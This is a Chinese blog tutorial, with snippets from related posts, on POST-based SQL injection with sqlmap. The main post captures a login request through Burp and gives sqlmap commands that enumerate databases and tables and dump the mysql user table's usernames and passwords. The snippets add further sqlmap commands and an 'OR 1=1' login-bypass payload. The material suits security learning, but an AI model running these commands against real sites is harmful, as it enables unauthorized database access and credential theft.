Sqlmap————5、POST注入

最新推荐文章于 2025-07-25 00:07:38 发布
原创 最新推荐文章于 2025-07-25 00:07:38 发布 · 1.3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了一种利用SQLMap工具进行SQL注入攻击的具体步骤。从配置Burp代理开始,到拦截并分析登录请求,最后通过一系列命令实现数据库列取、表名猜测及字段内容的读取。

具体流程:

(1)浏览器打开目标地址http:// www.xxx.com /Login.asp

(2)配置burp代理(127.0.0.1:8080)以拦截请求

(3)点击login表单的submit按钮

(4)这时候Burp会拦截到了我们的登录POST请求

(5)把这个post请求复制为txt, 我这命名为test.txt 然后把它放至sqlmap目录下

(6)运行sqlmap并执行如下命令:

1、列数据库:

sqlmap -r  test.txt  -p  username  –dbs

注:-r表示加载一个文件,-p指定参数

2、选择一个数据库列表名

 Sqlmap -r  test.txt -p username -D mysql –tables

3、猜列名

Sqlmap -r test.txt -p username -D mysql -T user –columns

4、猜字段名

sqlmap -r test.txt -p username -D mysql -T user -C “User,Password” –dump

【漏洞挖掘】——105POST注入深入剖析
Fly_鹏程万里
06-21 215
POST是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如:我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以POST的方式提交的服务器后再由服务器端进行验证,如果以POST提交的参数存在注入点,那么将这种注入称之为"POST"注入
SQL注入-产生位置+post注入+sqlmap
xiaoheizi的博客
06-28 499
—url没有参数并不代表没有注入,有时会在数据包中,http数据包中每个部分只要可以被接收,都可能产生漏洞。还有一种方式,不用保存数据包,可以直接扫描,就是使用。信息进行对比,涉及到数据库查询操作。信息整理保存,用户访问后数据库会获取用户的。网站根据用户的访问设备给予显示页面。会写到数据库,如果能自定义。测试显错位,结果直接爆出了。,然后将数据包中的两个。参数传递位置:可以在。测试出字段数后,输入。抓取登录数据包,右键。
利用sqlmap进行POST注入
热门推荐
ChuMeng1999的博客
01-19 1万+
目录预备知识了解SqlmapPOST注入形成的原因实验目的实验环境实验步骤一使用sqlmap进行POST注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 POST注入形成的原因 POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下
Sqlmap -- POST注入
Web安全工具库
07-07 3423
想归想,难过归难过,若你岁岁平安,我可生生不见。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包获取提交的数据 2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --data指定提交的数据 运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入 [14:37:09]...
SQL注入--sqlmap使用(POST注入
最新发布
rasssel的博客
07-25 957
理解什么是POST 型 SQL 注入。学会使用抓包工具提取注入请求。熟练掌握 SQLMapPOST 注入场景下的各种参数和使用方式。掌握自动识别注入点和提取数据库信息的完整流程。
sqlmap post注入经典例题讲解
loog
11-23 1621
在这里我们用如下例题进行讲解,本题是我做过的一道SQL注入POST注入型题,下面开始本教程。 本题为安恒攻防实验室题,连接:http://101.71.29.5:10001/search.jsp  第一步: 因为是POST注入,首先要知道提交的参数有哪些,在这里就需要配合Burp抓包 进行查看提交参数,下面是我抓包后获得的数据。 在这里我们就看到了POST提交的数据有哪些了,在这里...
sqlmappost注入
Galaxy_fan的博客
08-22 716
数据库 python sqlmap.py -r D:\GXY\python\sqlmap\test.txt --dbs 表 python sqlmap.py -r D:\GXY\python\sqlmap\test.txt --tables 数据 (users:表名) python sqlmap.py -r D:\GXY\python\sqlmap\test.txt -T users ...
SQLMap——解决SQL注入的棒棒棒工具
weixin_49816293的博客
01-05 467
一、简介。
详解强大的SQL注入工具——SQLMAP
05-09
SQLMAP是一个开源的渗透测试工具,专门用于自动探测和利用SQL注入漏洞。SQLMAP不仅可以在Windows平台上使用,同时也支持Linux平台,它的设计目标是为了帮助数据库管理员(DBA)和安全研究人员检测数据库配置的安全性...
SQL注入——POST注入和HEAD注入
weixin_46601374的博客
02-25 1819
POST注入如何注入 POST注入和普通注入一样,只是通过post提交数据,在提交的数据中进行注入post注入会出现在哪里 登录框,查询框等各种各样的框 万能密码原理 select username,password from users where username='admin' and password = ' 'or 1=1%23' limit 0,1(我们来看着语句逻辑,where后面是条件,username和password之间是and连接,所以两个有一个为否返回就是否,
sqlmap使用之-post注入、head注入(ua、cookie、referer)
weixin_51520483的博客
07-11 1478
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
DVWA——使用sqlmap工具post注入
@一只躺平的猪@的博客
07-09 4465
使用phpstudy搭建的DVWA靶场-暴力破解(low级别) sqlmap 可以看到密码解密为root 也可以用在线的md5对密文进行解密 https://www.cmd5.com/ 本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。
利用sqlmap进行post注入(实操)
peanut5036的博客
12-23 4196
SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数
sqlmap post注入
zhaozhanyong的专栏
11-19 6165
0x00 常用的 注入点:http://tetasp.vulnweb.com/Login.asp 几种注入方式: sqlmap -r search-test.txt -p tfUPass 其中search-test.txt的内容为以下所抓的post包 0x01 常参数的 sqlmap -r search-test.txt -p tfUPss 0x02 常参数的 sql
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 5568
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
sql注入--sqlmap学习笔记(POST型)
zhh2694399673的博客
03-18 432
也可以指定参数(根据经验):sqlmap -r 文件路径 -p uname --dbs。还可以再txt文件里,在想要扫描的参数后加星号,(可以在多个参数后加*)用来标定扫描的参数。然后用sqlmap -r 文件路径;这种是扫描数据包中所有的数据,慢。局限性是无法发现UA注入,Cookie注入,refer等注入。用bp抓包,表单提交之后的数据。把数据复制进一个.txt文件,
sqlmappost注入
墨渊的博客
09-29 252
调为low级 点击cope to file 把数据数据请求保存到txt -r 使用文件要先使用文件的路径 -r表示加载一个文件 --batch 表示自动输入参数 --dbs表示数据库 sqlmap -r 22.txt --batch --dbs -D 表示选择数据库 --tables表示数据库 sqlmap -r 22.txt --batch -D dvwa --tables -D -T 指定数据库查看的表 ----columns查看表的字段 –dump进行解密 ...
sqlmapPOST注入
Seizerz的博客
10-22 806
测试过程中,遇到POST注入该怎么判断呢,sqlmap前来报到。 有两种方法: 1、sqlmap -u "url" --forms --batch--dbs 2、burpsuite抓取请求包数据,保存成文件,利用sqlmap自动读取 先开启burpsuite监听,然后输入数据, 将监听到的包数据保存下来, sqlmap -r bao --batch自动执...
判断是get还是post注入
03-25
### SQL 注入在 GET 和 POST 请求中的差异及识别 SQL 注入是一种常见的安全漏洞,攻击者可以通过未验证的输入参数向应用程序发送恶意 SQL 查询语句。这种攻击可能通过 HTTP 的 GET 或 POST 方法实现。 #### 1. **GET 请求中的 SQL 注入** GET 请求通常用于从服务器获取数据,其参数会附加到 URL 中并显示在浏览器地址栏中。由于这些参数是可见的,因此更容易被攻击者发现和利用。 如果 Web 应用程序未能正确处理用户输入,则攻击者可以在 URL 参数中插入恶意 SQL 片段来执行非法操作[^1]。例如: ```http http://example.com/search?q=malicious' OR '1'='1 ``` 上述例子展示了如何通过修改 `q` 参数触发 SQL 注入攻击。 --- #### 2. **POST 请求中的 SQL 注入** 相比之下,POST 请求更常用于提交敏感数据(如表单),因为它的参数不会直接暴露在 URL 中,而是作为消息体的一部分传递给服务器。尽管如此,这并不意味着它更加安全——只要存在未经验证的动态 SQL 执行逻辑,同样可能发生 SQL 注入。 例如,在登录页面上,用户名或密码字段可能会成为潜在的目标。假设有一个简单的身份验证查询如下所示: ```sql SELECT * FROM users WHERE username = '$username' AND password = '$password'; ``` 当 `$username` 被设置为 `' OR '1'='1 --` 并且 `$password` 不受约束时,整个条件将始终成立,从而绕过认证机制。 --- #### 3. **如何区分 GET 和 POST 类型的 SQL 注入?** 要判断 SQL 注入发生的具体方式,可以从以下几个方面入手: - **日志分析**: 查看 Web 服务器访问日志文件或者 WAF (Web Application Firewall) 记录下来的信息。对于 GET 请求而言,异常行为往往表现为带有特殊字符编码模式的 URL;而对于 POST 请求来说,则需借助调试工具捕获实际传输的数据包内容。 - **监控网络流量**: 使用抓包软件(Wireshark/Fiddler/Burp Suite 等)拦截客户端与服务器之间的通信过程,观察是否存在可疑载荷注入现象[^2]。 - **Kibana 日志检索**: 如果有 Elasticsearch 数据存储支持的话,可以尝试编写类似下面这样的 Kibana 查询语句查找特定事件 ID 下的相关记录[^4]: ```kql event_id:10 AND request_method:(GET OR POST) AND malicious_payload:*injection* ``` 此处假定已定义好何谓 “malicious_payload”。 --- #### 4. **防御措施建议** 无论哪种类型的请求都应采取一致的安全防护策略以防止 SQL 注入风险的发生: - 利用预编译语句/存储过程代替内联式 SQL 编码; - 对所有外部输入进行全面校验过滤; - 实施最小权限原则配置数据库账户角色功能范围; - 定期扫描应用源代码寻找隐患位置并通过 sqlmap 工具模拟测试确认修复效果. ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值